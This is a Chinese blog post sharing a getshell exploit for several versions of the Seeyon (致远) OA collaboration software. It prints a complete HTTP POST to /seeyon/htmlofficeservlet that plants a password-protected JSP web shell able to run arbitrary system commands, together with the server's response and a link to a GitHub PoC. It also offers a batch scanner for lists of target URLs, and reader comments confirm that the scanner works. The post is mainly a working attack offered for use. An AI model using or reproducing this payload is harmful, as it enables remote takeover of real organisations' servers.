致远OA系统多版本Getshell - 附批量检测poc

  • 内容
  • 相关

漏洞影响产品版本:

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

漏洞情况:

  访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err'''

POST包:

   

  POST /seeyon/htmlofficeservlet HTTP/1.1

  Content-Length: 1121

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

  Host: xxxxxxxxx

  Pragma: no-cache

   

  DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

   

  响应包:

  DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV

  OPTION=S3WYOSWLBSGr

  currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

  CREATEDATE=wUghPB3szB3Xwg66

  RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

  originalFileId=wV66

  originalCreateDate=wUghPB3szB3Xwg66

  FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

  needReadFile=yRWZdAS6

  originalCreateDate=wLSGP4oEzLKAz4=iz=66

  CLIENTIP=wLCXqUKAP7uhw4g5zi=6

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

Image


Image

GitHub:

https://github.com/euphrat1ca/OtherScript/blob/3edfb9fbfa43fa4abe2cf5c5b014950ce4416699/exploit/seeyonPOC.txt


批量检测[回复可见]:

在脚本同目录下建立url.txt,放入待检测的URL,运行脚本。

管理员设置回复可下载

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:致远OA系统多版本Getshell - 附批量检测poc - http://www.shungg.cn/post/241

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

17条评论
  1. avatar

    TGAO Lv.1 Firefox 52.0 Firefox 52.0 Windows Windows 回复

    广东省广州市 移动

    1. avatar

      花生酱 Lv.1 Chrome 75.0.3770.142 Chrome 75.0.3770.142 Windows Windows 回复

      11哦哦

      陕西省西安市 电信

      1. avatar

        test1234 Lv.1 Chrome 75.0.3770.142 Chrome 75.0.3770.142 Windows Windows 回复

        大佬

        广东省广州市 移动

        1. avatar

          王军 Lv.1 Chrome 70.0.3538.110 Chrome 70.0.3538.110 Android 8.0.0 Android 8.0.0 回复

          直接可以批量监测吗?

          欧洲 CloudFlare公司CDN网络节点

          1. 舜哥哥吖 Chrome 75.0.3770.100 Chrome 75.0.3770.100 Mac OS X 10.14.5 Mac OS X 10.14.5 回复

            回复了王军:可以。

            陕西省西安市 电信

        2. avatar

          等到 Lv.1 Chrome 74.0.3729.108 Chrome 74.0.3729.108 Windows Windows 回复

          啦啦啦啦ssssssssss

          欧洲 CloudFlare公司CDN网络节点

          1. avatar

            阿萨是的 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

            啊实打实大所多无

            山东省 联通

            1. avatar

              阿萨是的 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

              咔咔咔咔咔咔扩

              山东省 联通